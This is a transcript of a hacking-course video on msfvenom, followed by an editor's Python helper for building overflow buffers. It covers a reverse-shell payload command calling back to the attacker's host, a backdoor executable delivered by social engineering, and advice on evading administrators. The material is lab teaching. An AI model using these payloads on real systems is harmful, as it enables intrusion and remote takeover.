Hello, everybody. Welcome to episode number 23 of the series, the Metasploit Framework and msfvenom.
My name is Alejandro Gina, and I'll be the instructor for today's session.
The learning objectives of the session are to understand the concept behind this attack and to apply the techniques to implement this attack. So let's get down to business, shall we?
First of all, we already saw some basics of the Metasploit Framework and the msfconsole. But let me go a little bit deeper into that knowledge by using the msfvenom module of the Metasploit Framework.
Remember that in the previous video, on using public exploits, we saw a public exploit that we used to actually exploit a buffer overflow vulnerability in the SLMail server.
Let's use that just to see how easily we can actually use msfvenom to get what we want.
Let me first start this on another tab here, just so you can remember the exploit that we used before. I can't remember it well, so let's go to our search and search for SLMail. We actually did all of this in the previous video. 638, it should be there. Okay.
And we called it exploit.py. And there you go. Remember that we changed the return address.
Remember that when we actually executed that, we created a bind shell with this exploit, a bind shell on port 4444. How about if we actually want to create a reverse shell on port 1234? Well, we just need to change that.
As you can see, in the previous video we used a public exploit, but we can also use Metasploit to achieve the exact same thing. Let me give you an example. We can just search for slmail here, and we quickly find an exploit. So just copy it, use it, and it just needs us to enter the remote host, and SLMail is already proven on all of these. If I go to show targets, it will just tell me the same thing.
The point is that if we actually go to this, this is how it is created. Remember, all of the exploits in the Metasploit Framework are created in Perl. So this Perl script will first detect the operating system, and whatever the operating system is, it will change the return address.
So remember that this is all created in Perl. Yeah, that's the thing. We just set the remote host to the Windows XP machine where the SLMail service runs, and we just hit run.
Here you go: it is trying Windows SLMail, and it will detect the operating system and get us our shell.
So yeah, that easy, huh? Yeah, I want to kill that.
Okay, enough about that. But what about if you actually want to modify the public exploit we used in the public exploits session?
We could actually do that with msfvenom. msfvenom is a Metasploit Framework tool that you can use to create your own exploits, or your own payloads to be more specific, not exploits but payloads, so you can achieve whatever you want in your exploits. For example, you downloaded a public exploit, as we're going to do in this video, and you don't actually want to execute the exact same payload; you want to create your own payload. You can do that with msfvenom. So let me just type here msfvenom,
then the payload. Actually, the payload I want to be, remember that it was a bind shell; now I want it to be a reverse shell.
And then the listening host, which will be my Kali machine, of course.
Then the listening port, which let's change to 1234, maybe, for some reason port 4444 wasn't working for us.
Then we will set EXITFUNC to thread. This is basically just to tell the exploit that whenever the service, or the one that we're actually attaching this payload to, is going to fail, it changes to the next one, so we do not crash the service.
For example, if you don't put that, it's most likely that our SLMail server will get us a reverse shell, but the SLMail service will not work afterwards, so that could be a little bit noisy.
Then the format: I want it to be C, because I want to actually just replace all of this with my payload. That's nice.
Platform: Windows, of course.
Then we can set some bad characters. All of this will make a little bit more sense when we see the buffer overflow module. But sometimes when you're creating that and actually executing the payload, if you're using some bad characters, for example the null character, which is represented by the hex code \x00, it can terminate your command or your steps. For example, if you're trying to get a reverse shell and something is being executed, if it finds a null character or a carriage return character, it could end execution, or mess up the execution process. So we need to avoid these characters. How to find them? We'll see that again in the buffer overflow module.
Okay, we don't want to use these bad characters when creating an exploit, and for encoding we'll use shikata_ga_nai; I'm hoping that's the correct way to say it.
This is just an encoder that I know works on Windows. But that's it.
And we hit enter, and it's supposed to create our exploit from here.
And there you go. This is very important: remember the bytes, the length in bytes. But I can just, remember, I already modified the return address. Let me just eliminate all of this so you can see how we can actually do it,
and just copy, just paste, I'm sorry, whatever was inside of our payload.
And just, oops, just equals. Okay, it's equals. And now we just need to save it.
And remember that we said that we will be listening on port 1234.
So let's fire up a listener here. I'm sorry, let's fire up the listener as before, and we'll listen for connections. And then just remember that we modified this, and just execute the exploit.
And yeah, we got a reverse shell in here.
So this is how powerful msfvenom can be.
In the previous exploit, the service was crashing after the first successful attempt. However, as I told you, we used the exit function to generate a more stable exploit. The service still works. If I kill this, start my listener again and perform the exact same thing, it will get me a reverse shell once again. So the service continues being functional, so we can buy some time in there and maybe go unnoticed by the administration team.
So that's the beauty and the power of msfvenom. With msfvenom, too, we can send, like, we can send the link to our service to our victim. For example, what if you want to create, let me just exit here. Oh, my God. What if you want to create an executable, for example?
So you can actually get the exact same command: the exact same payload, listening host, listening port, let me just change that for the purpose of this exercise to 122, I don't know, something like that. And actually I don't want it to be in C format, but I want it to be in the exe format, an executable format, and I just tell it to write to /root, for example.
And we save it to that, and by social engineering or something like that, we send that to our victim.
Remember that we're in our Windows XP machine. And it was reverse.txt, sorry, reverse.exe, and it downloaded that. And we can just, let me just start a listener here. What was the port? I think it was 122.
And as soon as I just open up that, yeah, run, it will get us a reverse shell back.
So yeah, you can see, again, we're in the Windows machine. So this is how powerful, how neat, nice and cool, whatever adjective you want to give it, msfvenom is. Yeah, you can do whatever you want. What if you don't want, maybe you're just messing with a buddy or something like that, and you don't actually want to get a reverse shell? All you want to do is, I don't know, for example, something silly like, just change the payload in here to something silly like opening the calculator. Something like that, I don't know, I'm just thinking out loud right now. So windows/exec, right, CMD=calc.exe.
So I'm just creating a payload to open the calculator, and I'm leaving the rest the same as it is. So let's actually execute that. We just generate that. If I go to my Windows XP machine and just put it here, the .exe, it's nothing, you know. Yeah, you want to run it? And boom, our calculator was opened. So that's how you can modify exploits. You can create your own payloads. Maybe, as we did in this video, we really have a public exploit,
and we just needed to modify it.
We can use all of that; we can use whatever exploit. Now, what exploits can you use? Well, you can quickly surf the internet for that. You can just go to the msfconsole, so you can see how many payloads you can actually use, which is a lot. I mean, I just showed you three different payloads, two different payloads to be more precise, reverse shells, but you can create bind shells, you can create a Meterpreter reverse shell, so you can boost your capabilities on the victim. Because at the end, msfvenom itself, I'm sorry, the Meterpreter shell is way better than a normal shell, right? So let me just show payloads here,
and you can see there's a lot of payloads in there. All of these payloads can be used in msfvenom, and you can create your own payloads. The fun part of this is that maybe you have a payload, but you don't have an exploit in the msfconsole.
So the point is that you can actually not use the msfconsole, because maybe there's no exploit in there. So you found an exploit on Exploit-DB, for example, and you just need to modify the payload, or you just need to modify something else. So this is the beauty of msfvenom in combination with the msfconsole. For example, if you want to create again a Meterpreter shell, you can actually start a Meterpreter listener on the msfconsole, and that will boost your knowledge and your capabilities on the victim machine.
Can you generate backdoors in an executable format with msfvenom? Yeah, you definitely can. Can we actually get remote control with this attack? Yeah, definitely we can. And you can actually start Calculator as well.
In this video we learned some concepts behind this attack, and we implemented some techniques to execute this attack, to create payloads basically, and we saw how malicious this can be. Supplemental materials: there's a new material here. We have The Hacker Playbook, that's always a go-to. But now we have Metasploit Unleashed, the reference for the msfvenom module. You can find a lot of good information and techniques on how to actually use more capabilities of msfvenom. And again, every possible source on Google and YouTube.
Looking forward, in the next video we'll cover tunneling. Well, that's it for today, folks. I hope you enjoyed the video, and talk to you soon.
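An editor's added example, not part of the lecture and not Metasploit's own code. The speaker pastes the `-f c` output of msfvenom into the public Python exploit by hand and relies on `-b` to keep NUL, CR and LF out of the payload; the script below does those steps with a check: it parses the C array into bytes, rejects any bad character, and assembles the junk + return address + NOP sled + shellcode buffer the exploit sends. The sample C output is constructed (not real shellcode), the offset and return address are hypothetical placeholders for the values in whatever exploit you are modifying, and the msfvenom command in the docstring is reconstructed from the video with `-a x86` assumed, since the video does not name the architecture.

```python
r"""Helper for dropping an msfvenom payload into a public Python exploit.

The msfvenom command described in the video (LHOST/LPORT are placeholders and
-a x86 is assumed; the video does not state the architecture):

  msfvenom -p windows/shell_reverse_tcp LHOST=<kali-ip> LPORT=1234 \
      EXITFUNC=thread -f c -a x86 --platform windows \
      -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
"""
import re
import struct

# Bytes handed to msfvenom with -b: NUL, LF and CR. In a text protocol these
# terminate the string or the line before the rest of the buffer is read.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for msfvenom's `-f c` output. These twelve bytes are NOT
# real shellcode; they only exercise the parser, and two of them (\x00, \x0a)
# are deliberately bad characters so the check below has something to catch.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00"
"\x60\x89\xe5\x31\xc0\x0a";
'''


def parse_msfvenom_c(text):
    """Convert the C-array text into raw bytes: each \\xNN escape is one byte."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(data, bad=BAD_CHARS):
    """Return the sorted list of forbidden byte values that occur in data."""
    return sorted({b for b in data if b in bad})


def build_buffer(shellcode, offset, ret_addr, nop_sled=16, bad=BAD_CHARS):
    """Assemble junk + return address + NOP sled + shellcode.

    offset   -- bytes of padding up to the saved return address
    ret_addr -- address the exploit returns into (e.g. a JMP ESP), packed
                little-endian for x86
    Both are hypothetical in the usage below; take the real ones from the
    public exploit being modified. Raises ValueError if any part of the
    buffer, the return address included, contains a bad character, because
    the vulnerable parser would truncate or alter it before it hits the stack.
    """
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    found = find_bad_chars(buf, bad)
    if found:
        raise ValueError("bad characters in buffer: "
                         + ", ".join("\\x%02x" % b for b in found))
    return buf


if __name__ == "__main__":
    # With real output the parsed bytes go straight into the exploit; the
    # constructed sample contains bad bytes, so it is rejected instead.
    sc = parse_msfvenom_c(SAMPLE_C_OUTPUT)
    print("parsed %d bytes, bad chars: %s" % (len(sc), find_bad_chars(sc)))
    try:
        build_buffer(sc, offset=100, ret_addr=0x12345678)  # hypothetical values
    except ValueError as err:
        print("rejected:", err)
```

If `find_bad_chars` reports anything after an encoded run, the `-b` list given to msfvenom was incomplete for this target; extend it and regenerate rather than patching bytes by hand, since the encoder's decoder stub must stay intact.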